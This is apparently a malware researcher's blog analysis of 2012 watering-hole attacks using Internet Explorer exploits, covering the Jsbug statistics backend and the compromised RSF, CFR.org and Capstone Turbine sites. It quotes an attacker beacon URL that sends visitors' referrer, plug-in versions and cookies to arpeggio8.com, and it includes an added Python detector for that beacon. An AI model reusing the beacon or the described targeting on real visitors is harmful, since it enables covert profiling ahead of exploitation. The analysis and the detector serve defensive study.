The “rsf.php” script only provides content if the parameter “id=1024” is present. This script loads the “ie.html” file through an iframe. “rsf.php” is the equivalent of “exploit.html” in the CVE-2012-4969 0day found in mid-September.

The “ie.html” file is the equivalent of “Protect.html” in the CVE-2012-4969 0day found in mid-September, but here no Flash file is involved in the heap spray. The “ie.html” file contains packed JavaScript code which does the heap spray and triggers the vulnerability. Pastebin encoded version and decoded version.

The JavaScript is decoded through the “decode” function, and the key “0xe1” for decoding is provided as an argument to the function. The JavaScript “int_to_hex” function checks whether Oracle Java 6 is present, whether the operating system is Windows 7 or XP, and whether Internet Explorer 9 is used. The script also gathers the browser language.

If Windows XP is used and the language is “en-us”, “zh-cn”, “zh-tw”, “ko” or “ja” (hum hum CVE-2012-4792…), then the vulnerability is triggered.

If Windows 7 is used and Java 6 is installed, then the vulnerability is triggered. A spray base value is provided in the code for Internet Explorer 9, but “count.php” has already filtered the targeted browsers.

Once the vulnerability is triggered, the “917.exe” (6b4aa596e5a4208371942cdb0e04dfd9) file is installed. This malware is known as “Trojan-Dropper.Win32.Dapato.bscc”.

An interesting point regarding the “ie.html” file: this file dates from the 19th of September.

Some facts regarding CVE-2012-4969:

  • The vulnerability was discovered being exploited in the wild, with a Flash variant, on the 14th of September.
  • A Metasploit PoC was provided on the 17th of September.
  • Microsoft Security Advisory MSA-2757760 was published on the 17th of September.
  • The Microsoft patch was provided in MS12-063 on the 21st of September.

But you will see, in the next chapter, that the attack began on the 18th of September.

“count2.php” script and Jsbug backend usage

The “count2.php” script is loaded in all cases, for statistics purposes. This script creates and checks two cookies, “stat_cookie” and “stat_time”, and gathers the version of Adobe Flash, the presence of Oracle Java and the HTTP referrer. All this information is sent back to the same script as parameters:

http://arpeggio8.com/count/count2.php?n='+Math.random()+'&action=jpg&stat_refer='+escape(location.href)+'&stat_flash='+escape(flashVer)+'&stat_java='+escape(stat_java)+'&stat_cookie='+stat_cookie+'&stat_time='+stat_time;
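
As an added example, not part of the original post, the following Python code recognises this beacon format in proxy-log URLs and decodes the fields it carries, so a defender can list which of their pages were emitting it and what the victims' plug-in versions were. The sample URLs and the victim-site hostnames are constructed placeholders.

```python
"""Recognise and decode the Jsbug "count2.php" beacon in proxy-log URLs.

Added example, not part of the original post. The sample URLs below are
constructed after the request format quoted above (the random "n" value,
"action=jpg" and the "stat_*" fields); the victim hostnames are placeholders.
"""
from urllib.parse import urlsplit, parse_qs

# Fields the count2.php beacon quoted above always carries.
JSBUG_FIELDS = {"stat_refer", "stat_flash", "stat_java", "stat_cookie", "stat_time"}


def parse_jsbug_beacon(url):
    """Return the decoded beacon fields if `url` matches the Jsbug count2.php
    request format (action=jpg plus every stat_* field), otherwise None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/count2.php"):
        return None
    # parse_qs percent-decodes the escape()'d values for us; keep empty values,
    # since stat_flash/stat_java are blank when the plug-in is absent.
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("action") != ["jpg"] or not JSBUG_FIELDS.issubset(q):
        return None
    return {
        "backend": parts.hostname,            # server collecting the statistics
        "victim_page": q["stat_refer"][0],    # page carrying the malicious inclusion
        "flash": q["stat_flash"][0],
        "java": q["stat_java"][0],
        "cookie": q["stat_cookie"][0],
        "first_seen": q["stat_time"][0],
    }


def find_beacons(urls):
    """Group the beacons found in `urls` by the compromised page that emitted them."""
    by_page = {}
    for url in urls:
        beacon = parse_jsbug_beacon(url)
        if beacon:
            by_page.setdefault(beacon["victim_page"], []).append(beacon)
    return by_page


# Constructed sample proxy-log URLs; only the first two are real beacons.
SAMPLE_URLS = [
    "http://arpeggio8.com/count/count2.php?n=0.4173&action=jpg"
    "&stat_refer=http%3A//spacefoundation.example/&stat_flash=11.4.402.265"
    "&stat_java=1.6.0_35&stat_cookie=a1b2c3&stat_time=1347948000",
    "http://arpeggio8.com/count/count2.php?n=0.9901&action=jpg"
    "&stat_refer=http%3A//rsfchinese.example/&stat_flash=&stat_java="
    "&stat_cookie=d4e5f6&stat_time=1348034400",
    "http://www.example.org/count2.php?n=1&action=jpg&stat_refer=x",   # fields missing
    "http://arpeggio8.com/count/count.php",                            # the gate script
    "http://www.example.org/stats/count2.php?action=png&stat_refer=a"
    "&stat_flash=b&stat_java=c&stat_cookie=d&stat_time=e",             # wrong action
]

if __name__ == "__main__":
    for page, beacons in find_beacons(SAMPLE_URLS).items():
        print(page, "->", [(b["backend"], b["flash"], b["java"]) for b in beacons])
```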

All this information is stored in a backend named “Jsbug”. This backend is quite simple, with only three menus: “Client statistics”, “Report” and “Create Exploit”. The backend doesn’t have any external CSS or image files, and is typically composed of a minimum of three PHP scripts.

The login page of the backend is also quite simplistic: no page title, no text in the page, and this simplicity makes it harder to discover through Google searches.

The “Client statistics” menu leads to a recap page of all visitors who loaded “count2.php”, with OS type, browser type and version, version of Adobe Flash, version of Oracle Java, IP address, HTTP referer, number of visits, and first and last visit dates.

In the case of the Space Foundation watering hole attack, the first dates begin on the 18th of September.

In the case of the RSF Chinese watering hole attack, the first dates begin on the 19th of September.

These attacks ended around mid-October.

The “Report” menu leads to a statistics page of all visitors.

The “Create Exploit” menu is a page which helps the attackers generate their JavaScript inclusion code.

Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More

Since the release of MSA-2794220 by Microsoft, regarding the CVE-2012-4792 vulnerability, a Fix-it solution has been provided, KB2794220. I urgently advise you to apply this Fix-it solution, or to use another browser, until the release of the final patch, surely planned for the 8th of January Microsoft Patch Tuesday.

I have some interesting and funny additional information regarding the CFR watering hole attack, and I would like to share it with you. But first, I recommend that you read the following analyses done by security companies or independent security researchers:

Let’s start with the analysis of only two samples, “news_14242aa.html” and “Helps.html”. These two samples are quite interesting, and a complete blog post is enough for them. I will analyze the other samples in further dedicated blog posts.

news_14242aa.html (545cb268267609910e1312399406cdbc)

This sample was extracted from Google cache with a cache date of 7 Dec 2012 14:12:28 GMT. This sample clearly demonstrates that the compromise of CFR.org did not happen on the 20th or 21st of December, as mentioned by security companies or media, but really sooner. The proof is still indexed and in Google’s cache.

Helps.html (a25c13d4edb207e6ce153469c1104223)

I received this sample around the 29th of December. This file is the equivalent of the first sample but with some modifications; you can see the differences in the following online diff. Additional languages have been added (jp – ru – ko), all the stuff regarding Microsoft Office documents has been removed (boy or girl), some additional “blank” locations have been added and the body text has been hidden.

Now, if you search VirusTotal for this MD5, you can find a related sample, but with another filename, “config.html”, which was submitted on 2012-12-31 18:29:47 UTC. Looks interesting, but it has to be confirmed.

If you execute a request on urlQuery to search for all “config.html” files from the last month, you will discover a submission, dating from 2012-12-29 22:58:29, for the URL “http://www.capstoneturbine.com/_include/config.html” on server 74.62.198.72. If you take a look at the urlQuery report, you can see some “deployJavaPlugin” strings.

The Capstone Turbine Corporation company description makes me believe that this company profile could be a choice of quality for a targeted attack:

Capstone Turbine Corporation ® is the world’s leading producer of low-emission microturbine systems, and was first to market with commercially viable microturbine energy products. Capstone Turbine has shipped thousands of Capstone MicroTurbine systems to customers worldwide.

By doing a Google dork search, “site:capstoneturbine.com "_include"”, you can see something strangely similar to the CFR.org “news_14242aa.html” file.

This page is also cached in Google cache, and guess what? Ho, Ho Ho, CVE-2012-4792 has been in the house since the 18th of December 16:10:40 GMT. So CFR.org was and is not the only target of this attack!

Now we will try to define the date of compromise of Capstone Turbine Corporation through research on Google with another Google dork, “"capstoneturbine.com" "_include"”. And we can find some interesting information 😉

On support.clean-mx.de we can discover that the same “/_include/config.html” URL has been indexed since 2012-09-19 04:31:01. But what is awesome is the evidence attached to this submission: hoho, it is the CVE-2012-4969 I discovered in September 🙂 “Grumgog.swf” is in the house.

My conclusions are:

  • CFR.org had been compromised since at least the beginning of December.
  • CVE-2012-4792 had been present on CFR.org since at least the beginning of December.
  • CVE-2012-4792 was also used to target the visitors of another company, named Capstone Turbine Corporation.
  • CVE-2012-4792 had been present on Capstone Turbine Corporation since at least the 18th of December.
  • Capstone Turbine Corporation was also used to spread CVE-2012-4969, and this since mid-September.
  • Potentially, Capstone Turbine Corporation has been compromised since at least the beginning of September.
  • Potentially, the people behind CVE-2012-4969 and CVE-2012-4792 are the same.

But, there is always a but in a story: take a look at the first submission for Capstone Turbine Corporation in August, “http://www.capstoneturbine.com/_flash/videos_native/exploit.html”. Imagine 🙂

Update 1 – 2013-01-02 1:30 am:

Jindrich Kubec, director of Threat Intelligence at avast!, confirms the presence of CVE-2012-4969 in September on Capstone Turbine Corporation.